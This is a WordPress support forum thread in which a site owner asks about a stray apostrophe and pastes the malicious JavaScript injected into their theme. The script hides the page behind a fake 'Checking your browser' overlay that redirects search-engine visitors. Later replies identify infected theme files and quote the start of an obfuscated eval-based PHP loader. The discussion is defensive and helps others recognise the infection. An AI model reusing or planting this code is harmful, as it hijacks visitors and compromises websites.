Random apostrophe on website

  • Resolved shopual

    (@shopual)


    8 years, 10 months ago

    We have a random apostrophe towards the bottom of each of the pages in our WordPress website (shopUAL.com). I have found where the apostrophe is in the code when I “view source” while on the home page, BUT I can not find where this code is in the Editor files in WordPress, or what (if any) plugin it might belong to.

    I am new to WordPress and have limited coding knowledge, so any help would be GREATLY appreciated!

    This is the code:

    <script type='text/javascript'>
function start(){function s(e){var t=document.cookie,n=t.indexOf(' '+e+'=');n==-1&&(n=t.indexOf(e+'='));if(n==-1)t=null;else{n=t.indexOf('=',n)+1;var r=t.indexOf(';',n);r==-1&&(r=t.length),t=unescape(t.substring(n,r))}return t}function o(e,t,n){var r=new Date;r.setDate(r.getDate()+n);var i=escape(t)+(n==null?'':'; expires='+r.toUTCString());document.cookie=e+'='+i}function u(){var e=s('referrerRedirectCookie');return e!=null&&e!=''?!0:(o('referrerRedirectCookie','do not redirect',730),!1)}var e=document.referrer,t,n=['',' '],r=['google','yahoo','bing','yandex','baidu','gigablast','soso','blekko','exalead','https','duckduckgo','http'];if(!e)console.log('direct'),u();else for(t=0;t<r.length;++t)if(e.indexOf(r[t])+1&&!u()){var i=navigator.userAgent;if(!i||i.length==0)return;i=i.toLowerCase(),i.indexOf('google')==-1&&i.indexOf('bot')==-1&&i.indexOf('crawl')==-1&&hideWebSite()}}function createPopup(){var e=document.createElement('div');e.style.position='absolute',e.style.width='100%',e.style.height='100%',e.style.left=0,e.style.top=0,e.style.backgroundColor='white',e.style.zIndex=99999,document.body.appendChild(e),e.onclick=function(){window.location=w_location};var t=document.createElement('p');return t.innerText='Checking your browser before accessing '+window.location.host+'...',t.style.textAlign='center',t.style.fontSize='x-large',t.style.position='relative',t.textContent=t.innerText,e.appendChild(t),e}function createButton(){var e=document.createElement('div');return e.style.position='absolute',e.style.top='20%',e.style.left='10%',e.style.right='10%',e.style.width='80%',e.style.border='1px solid black',e.style.textAlign='center',e.style.verticalAlign='middle',e.style.margin='0, auto',e.style.cursor='pointer',e.style.fontSize='xx-large',e.style.borderRadius='5px',e.onclick=function(){window.location=w_location},e.onmouseover=function(){e.style.border='1px solid red',e.style.color='red'},e.onmouseout=function(){e.style.border='1px solid black',e.style.color='black'},e.innerText='Continue',e.textContent=e.innerText,e}var w_location='/?pagerd_' + Math.random().toString(36).substring(7),hideWebSite=function(){var e=createPopup(),t=createButton();e.appendChild(t)},readyStateCheckInterval=setInterval(function(){(document.readyState==='complete'||document.readyState=='interactive')&&clearInterval(readyStateCheckInterval)},10);start();
</script>'

Viewing 4 replies - 1 through 4 (of 4 total)

  • I’m seeing the same. Does anyone know how this is being added?

    Thread Starter shopual

    (@shopual)

    Well, I found the problem. Actually, SiteLock found it. It was buried in the code for our Avada theme. I just didn’t have the time to go through all of the code myself, so we purchased the SiteLock program. It found the bug and removed it in 1 day.

    This is where SiteLock says it found the infected code:
    wp-content/themes/Avada/footer.php
    wp-content/themes/Avada/header.php
    wp-content/themes/twentytwelve/header.php

    I hope this can help someone!

    Its not isolated to only wordpress sites. This was appended to a theme in a Joomla site.

    I didn’t use SiteLock but I did seem to have been hacked with very similar code as the original post. I found that my theme’s footer.php had been modified and an eval() statement was put in.

    This isn’t the full code but it starts like this:

    <?php function nBMj($NrG)
{
$NrG=gzinflate(base64_decode($NrG));
 for($i=0;$i<strlen($NrG);$i++)
 {
$NrG[$i] = chr(ord($NrG[$i])-1);
 }
 return $NrG;
 }eval(nBMj("nVgNc9o4E

    In other words, it’s a fairly standard eval() injection type of attack…

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Random apostrophe on website’ is closed to new replies.